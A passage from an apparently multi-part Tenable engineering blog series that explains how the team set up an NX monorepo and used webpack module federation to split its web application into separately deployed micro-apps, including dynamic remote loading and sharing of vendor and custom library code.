At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.

The Power Of NX

Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.

We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs command with no active changes in our repository. Shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.

Now we will make a slight update to our test-component-1.tsx file (line 19):

If we re-run the affected commands above, we see that the following apps/libs are impacted: design-system, tenable-io, and design-system/components.

Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.

With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one of our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces, for example via nx affected --target=test.

Summary

Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:

  1. Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
  2. Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.


3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

4. Introducing Module Federation

16 December 2021 at 17:13

Introducing Module Federation

This is post 4 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.

The Problem

Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.

This was problematic for a number of reasons:

  • Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these are good options.
  • Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
  • E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team’s E2E tests fail, it blocks the other team’s changes from making it to production. This was a significant bottleneck for us.

The Solution

Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.

As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.

Workspaces

One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:

  • Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
  • Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
  • Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.

This simple diagram illustrates the relationship between the Host and micro-apps:

Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).

Before (line 5)

After (lines 4–6)

Note: When leveraging module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that’s best for you. This article does a good job in breaking these options down.

Workspace Commands

Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each of the micro-app’s package.json file. This command starts the webpack dev server for each application.

The serve target for host — Kicks off the dev servers for all 3 apps
Dev command for host — Applications 1 & 2 are identical
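The screenshots are not reproduced here; the sketch below shows the general shape of such a serve target (directory names, the parallel flag and the dev script are assumptions for illustration):

"host": {
  "root": "apps/host",
  "projectType": "application",
  "targets": {
    "serve": {
      "executor": "@nrwl/workspace:run-commands",
      "options": {
        "parallel": true,
        "commands": [
          "cd apps/host && npm run dev",
          "cd apps/application-1 && npm run dev",
          "cd apps/application-2 && npm run dev"
        ]
      }
    }
  }
}

And each micro-app's package.json defines the dev script that starts its webpack dev server, for example:

"scripts": {
  "dev": "webpack serve"
}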

At this point, if we run nx serve host (serve being one of the targets defined for the host workspace), it will kick off the three commands shown above. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.

Webpack Configuration — Host

The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.

Some items of note include the following (an illustrative configuration sketch follows this list):

  • ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
  • remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
  • shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
  • devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.
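A minimal sketch of such a Host configuration is shown below; it is not the actual file from the article, and the loader setup, ports, and the choice of shared libraries beyond react are assumptions for illustration.

// webpack.config.js for the Host (sketch)
const { ModuleFederationPlugin } = require('webpack').container;
const HtmlWebpackPlugin = require('html-webpack-plugin');

module.exports = {
  entry: './src/index',
  mode: 'development',
  output: { publicPath: 'auto' },
  resolve: { extensions: ['.ts', '.tsx', '.js', '.jsx'] },
  module: {
    rules: [{ test: /\.[jt]sx?$/, exclude: /node_modules/, use: 'babel-loader' }],
  },
  devServer: {
    port: 3000,
    // Required so the Host can fetch assets served on the other dev-server ports.
    headers: { 'Access-Control-Allow-Origin': '*' },
  },
  plugins: [
    new ModuleFederationPlugin({
      name: 'host',
      // The two remotes the Host knows about. Their remoteEntry.js files are
      // loaded separately (statically via index.html in this first setup).
      remotes: {
        application1: 'application1',
        application2: 'application2',
      },
      // Libraries that must only ever be loaded once across all micro-apps.
      shared: {
        react: { singleton: true },
        'react-dom': { singleton: true },
      },
    }),
    new HtmlWebpackPlugin({ template: './public/index.html' }),
  ],
};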

Webpack Configuration — Application

The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. In our case, the exposes property of the ModuleFederationPlugin defines what is exposed to the Host application when it goes to import from either of these. This is the exposes property’s purpose: it defines a public API that determines which files are consumable. So in our case, we will only expose the index file (‘.’) in the src directory. You’ll see we’re not defining any remotes, and this is intentional. In our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.
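A sketch of the plugin portion for application1 follows (illustrative only; everything outside the plugin matches the Host configuration above, except that the dev server runs on its own port):

// webpack.config.js for application1 (sketch): no remotes, only exposes.
new ModuleFederationPlugin({
  name: 'application1',
  filename: 'remoteEntry.js', // served at http://localhost:3001/remoteEntry.js in dev
  exposes: {
    '.': './src/index', // only the index file is consumable from outside
  },
  shared: {
    react: { singleton: true },
    'react-dom': { singleton: true },
  },
}),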

In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:
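For example, something along these lines (the component path is hypothetical):

exposes: {
  '.': './src/index',
  './TestComponent1': './src/components/test-component-1',
},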

Initial Load

When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called bootstrap.js. This approach avoids the error “Shared module is not available for eager consumption,” which you can read more about here.

The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like normal components:
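A sketch of the two files (component names and the render target are assumptions):

// index.js: load the real entry point asynchronously so webpack can set up
// the shared scope first, avoiding the eager-consumption error.
import('./bootstrap');

// bootstrap.jsx: the real entry point, importing the remotes like normal components.
import React from 'react';
import ReactDOM from 'react-dom';
import Application1 from 'application1';
import Application2 from 'application2';

const App = () => (
  <>
    <Application1 />
    <Application2 />
  </>
);

ReactDOM.render(<App />, document.getElementById('root'));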

Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:
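For instance, something like the following (path and export shape are hypothetical):

import TestComponent1 from 'application1/TestComponent1';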

At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:

Loading The Remotes

To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:

In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.

We know application 1 and 2 are getting built, and they’re being served up at ports 3001 and 3002. So why can’t the Host find them? The issue is because we haven’t actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:

Our host specifies the index.html file
The index.html file is responsible for loading in the remote entries

Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:

Summary

At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:


4. Introducing Module Federation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

5. Module Federation — Managing Your Micro-Apps

16 December 2021 at 17:15

Module Federation — Managing Your Micro-Apps

This is post 5 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

The Problem

When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.

As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.

The Solution

To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

The Serve Command

One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:
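The script itself appears in the original as a screenshot; the sketch below captures the general idea only. Flag handling, paths and the readiness check are assumptions: per the article, the real script had each micro-app's webpack configuration emit an explicit ready message (rather than sniffing output), filtered out library workspaces, and also handled an --appOnly flag.

// tools/serve.js (sketch): spin up dev servers only for the requested micro-apps.
const { spawn } = require('child_process');
const fs = require('fs');

const args = process.argv.slice(2);
const all = args.includes('--all');
const appsArg = args.find((a) => a.startsWith('--apps='));
const extraApps = appsArg ? appsArg.replace('--apps=', '').split(',') : [];

const { projects } = JSON.parse(fs.readFileSync('workspace.json', 'utf8'));
const apps = all ? Object.keys(projects) : ['host', ...extraApps];

apps.forEach((app) => {
  // Each requested micro-app gets its own webpack dev server process.
  const child = spawn('npm', ['run', 'dev'], { cwd: `apps/${app}`, shell: true });
  child.stdout.on('data', (chunk) => {
    if (chunk.toString().includes('compiled successfully')) {
      console.log(`${app} compiled and is ready`);
    }
  });
  child.stderr.pipe(process.stderr);
});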

In our webpack configuration, we send a ready message once a micro-app finishes compiling; the serve command above listens for that message and uses it to keep track of when each micro-app is done.

Remote Utilities

Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, it would return the name of the remotes along with the port they should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.
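A rough sketch of such a utility (naming and the port scheme are assumptions; library workspaces, which contain a slash in their names in this repository, are filtered out):

// tools/remote-utils.js (sketch): derive the remotes and a stable dev-server
// port for each one from workspace.json, so newly added micro-apps are picked
// up without extra configuration.
const fs = require('fs');

const BASE_PORT = 3001; // the host stays on port 3000 in this sketch

function getRemotes() {
  const { projects } = JSON.parse(fs.readFileSync('workspace.json', 'utf8'));
  return Object.keys(projects)
    .filter((name) => name !== 'host' && !name.includes('/'))
    .sort()
    .map((name, index) => ({ name, port: BASE_PORT + index }));
}

module.exports = { getRemotes };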

Putting It All Together

Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above, i.e. it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a host of various engineering needs:

  • Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
  • Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
  • Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
  • All — If we wanted to spin up everything, we could run npm run serve --all.

You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.

Note: If you use Visual Studio Code, you can accomplish some of this same functionality through the NX Console extension.

Loading Your Micro-Apps — The Static Approach

In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:

Application 1 & 2 are imported at the top of the file, which means they have to be loaded right away
The moment our app loads, it has to load in the remote entry files for each micro-app

However in the real world, this is not the best approach. By taking this approach, the moment your application runs, it is forced to load in the remote entry files for every single micro-app. For a real world application that has many micro-apps, this means the performance of your initial load will most likely be impacted. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In this case, it would be much better if the micro-apps could be loaded in dynamically only when a particular route is hit.

In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.

Loading Your Micro-Apps — The Dynamic Approach

Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.

Once we had the necessary information we needed for the remotes (via the REMOTE_INFO variable), we then updated our bootstrap.jsx file to leverage a new component we discuss below called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded in until it’s actually needed, leading to a huge boost in performance.

The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src=”…remoteEntry.js”></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.
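The sketch below follows webpack's documented dynamic-remote-containers pattern rather than reproducing Tenable's exact component; the shape of REMOTE_INFO and the prop names are assumptions.

// MicroApp.jsx (sketch)
import React, { useEffect, useState } from 'react';

// Injects <script src=".../remoteEntry.js"> once, resolving when it has loaded.
function loadRemoteEntry(url) {
  return new Promise((resolve, reject) => {
    const script = document.createElement('script');
    script.src = url;
    script.onload = resolve;
    script.onerror = reject;
    document.head.appendChild(script);
  });
}

// Initializes the remote container and returns the requested exposed module.
// __webpack_init_sharing__ and __webpack_share_scopes__ are webpack globals.
async function loadModule(scope, exposedModule) {
  await __webpack_init_sharing__('default');
  const container = window[scope]; // e.g. window.application1
  await container.init(__webpack_share_scopes__.default);
  const factory = await container.get(exposedModule); // e.g. '.'
  return factory();
}

export function MicroApp({ name, exposedModule = '.' }) {
  const [Component, setComponent] = useState(null);
  // REMOTE_INFO is injected at build time; its shape is assumed here.
  const { url } = REMOTE_INFO[name];

  useEffect(() => {
    loadRemoteEntry(url)
      .then(() => loadModule(name, exposedModule))
      .then((mod) => setComponent(() => mod.default || mod));
  }, [name, exposedModule, url]);

  return Component ? <Component /> : null;
}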

Summary

By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.


5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

16 December 2021 at 17:16

Module Federation — Sharing Vendor Code

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.
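A sketch of what that shared configuration might look like follows. react is the only library named in the article; the other entries, the package.json lookup, and the use of requiredVersion (rather than another version property) are assumptions for illustration.

const packageJson = require('./package.json');
const { ModuleFederationPlugin } = require('webpack').container;

const npmSharedLibs = {
  react: { singleton: true, requiredVersion: packageJson.dependencies['react'] },
  'react-dom': { singleton: true, requiredVersion: packageJson.dependencies['react-dom'] },
  'styled-components': { singleton: true, requiredVersion: packageJson.dependencies['styled-components'] },
};

module.exports = {
  // ...
  plugins: [
    new ModuleFederationPlugin({
      // ...name, remotes or exposes, etc.
      shared: { ...npmSharedLibs },
    }),
  ],
};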

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:
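For example, alongside the existing entries (same package.json lookup as in the earlier sketch):

const npmSharedLibs = {
  // ...previous entries...
  '@styled-system/theme-get': {
    requiredVersion: packageJson.dependencies['@styled-system/theme-get'],
  },
};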

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent and capable of sharing code between themselves when appropriate. This is the best of both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

7. Module Federation — Sharing Library Code

16 December 2021 at 18:44

Module Federation — Sharing Library Code

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way, once we load in App B, it's first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn't been loaded in yet (or the version it needs isn't compatible with the version App A loaded in), then it will proceed to load its own version. Otherwise, if it's the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file
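A sketch of that dynamic alias construction (simplified; it assumes each path in tsconfig.base.json points directly at a single entry file and that the file contains no comments):

// webpack.config.js (sketch): build resolve.alias entries from the paths in
// tsconfig.base.json so newly added library entry points are picked up automatically.
const path = require('path');
const tsconfig = require('./tsconfig.base.json');

const alias = Object.entries(tsconfig.compilerOptions.paths).reduce(
  (acc, [importPath, [target]]) => {
    acc[importPath] = path.resolve(__dirname, target);
    return acc;
  },
  {}
);

module.exports = {
  // ...the rest of the configuration...
  resolve: { alias, extensions: ['.ts', '.tsx', '.js', '.jsx'] },
};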

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to generate a unique identifier to act as the library version. Specifically, when we build a particular library, we look at the folder containing the library and generate a unique hash based on the contents of that directory. This way, if the contents of the folder change, the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.
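A minimal sketch of how this can be wired together is shown below, assuming the folder-hash library (its hashElement method) and the webpack 5 ModuleFederationPlugin. The directory layout, the exact shared options and the way the hash is folded into a semver-style string are assumptions, not the exact implementation.

// webpack.config.js (sketch): share custom libs with a content-hash based version
const { hashElement } = require('folder-hash');
const { ModuleFederationPlugin } = require('webpack').container;
const { compilerOptions } = require('./tsconfig.base.json');

async function buildSharedLibs() {
  const shared = {};
  for (const [alias, [target]] of Object.entries(compilerOptions.paths || {})) {
    const libDir = target.replace(/\/src\/.*$/, ''); // hypothetical: hash the whole library folder
    const { hash } = await hashElement(libDir, { folders: { exclude: ['node_modules'] } });
    // Webpack's share scope expects semver-like strings, so the hash is embedded in a prerelease tag.
    const version = `0.0.0-${hash.replace(/[^a-zA-Z0-9]/g, '')}`;
    shared[alias] = { version, requiredVersion: version };
  }
  return shared;
}

module.exports = async () => ({
  plugins: [
    new ModuleFederationPlugin({
      name: 'application1', // placeholder name
      shared: {
        ...(await buildSharedLibs()),
        // vendor libraries (react, react-dom, ...) are shared as described in the previous article
      },
    }),
  ],
});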

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:

We can now import each one of these individual components:
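For illustration only, the granular setup looks roughly like this; the per-component path names and component exports are hypothetical, not the exact demo code.

// tsconfig.base.json (excerpt, shown as comments): one path per component instead of a single index
//   "@microfrontend-demo/design-system/components/test-component-1": ["libs/design-system/components/src/lib/test-component-1/index.ts"],
//   "@microfrontend-demo/design-system/components/test-component-2": ["libs/design-system/components/src/lib/test-component-2/index.ts"],

// Consumers then import each component individually, so webpack can split and share them one by one:
import { TestComponent1 } from '@microfrontend-demo/design-system/components/test-component-1';
import { TestComponent2 } from '@microfrontend-demo/design-system/components/test-component-2';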

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.

Cons

